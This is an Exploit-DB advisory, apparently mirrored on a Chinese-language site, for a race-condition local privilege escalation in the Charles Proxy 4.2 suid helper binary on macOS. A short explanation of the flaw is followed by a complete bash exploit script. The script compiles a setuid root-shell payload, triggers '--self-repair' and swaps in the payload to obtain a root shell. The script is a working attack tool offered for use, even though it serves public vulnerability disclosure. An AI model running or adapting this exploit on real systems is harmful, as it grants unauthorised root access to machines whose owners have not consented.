Charles Proxy 4.2 – Local Privilege Escalation

  • 作者: Mark Wadham
    日期: 2018-07-30
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  • 来源:https://www.exploit-db.com/exploits/45107/
  • Charles Proxy is a great mac application for debugging web services and
    inspecting SSL traffic for any application on your machine.
    
    In order to inspect the SSL traffic it needs to configure the system to use a
    proxy so that it can capture the packets and use its custom root CA to decode
    the SSL.
    
    Setting a system-wide proxy requires root permissions so this is handled by an
    suid binary located within the Charles application folder:
    
    /Applications/Charles.app/Contents/Resources/Charles Proxy Settings
    
    Unfortunately this binary is vulnerable to a race condition which allows a local
    user to spawn a root shell. It supports a parameter "--self-repair" which it
    uses to re-set the root+suid permissions on itself, with a graphical dialog
    shown to the user. However if this is called when the binary is already
    root+suid then no password dialog is shown.
    
    It doesn't validate the path to itself and uses a simple API call to get the
    path to the binary at the time it was invoked. This means that between executing
    the binary and reaching the code path where root+suid is set there is enough
    time to replace the path to the binary with an alternate payload which will then
    receive the suid+root permissions instead of the Charles binary.
    
    This issue was fixed in Charles 4.2.1 released in November 2017.
    
    https://m4.rkw.io/charles_4.2.sh.txt
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    #!/bin/bash
    
    ####################################################
    ###### Charles 4.2 local root privesc exploit ######
    ###### by m4rkw - https://m4.rkw.io/blog.html ######
    ####################################################
    
    cd
    user="`whoami`"
    
    cat > charles_exploit.c <<EOF
    #include <unistd.h>
    int main()
    {
    setuid(0);
    seteuid(0);
    execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
    return 0;
    }
    EOF
    
    gcc -o charles_exploit charles_exploit.c
    if [ $? -ne 0 ] ; then
    echo "failed to compile the exploit, you need xcode cli tools for this."
    exit 1
    fi
    rm -f charles_exploit.c
    
    ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
    ./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
    rm -f ./Charles\ Proxy\ Settings
    mv charles_exploit Charles\ Proxy\ Settings
    
    i=0
    
    while :
    do
    r=`ls -la Charles\ Proxy\ Settings |grep root`
    if [ "$r" != "" ] ; then
    break
    fi
    sleep 0.1
    i=$((i+1))
    if [ $i -eq 10 ] ; then
    rm -f Charles\ Proxy\ Settings
    echo "Not vulnerable"
    exit 1
    fi
    done
    
    ./Charles\ Proxy\ Settings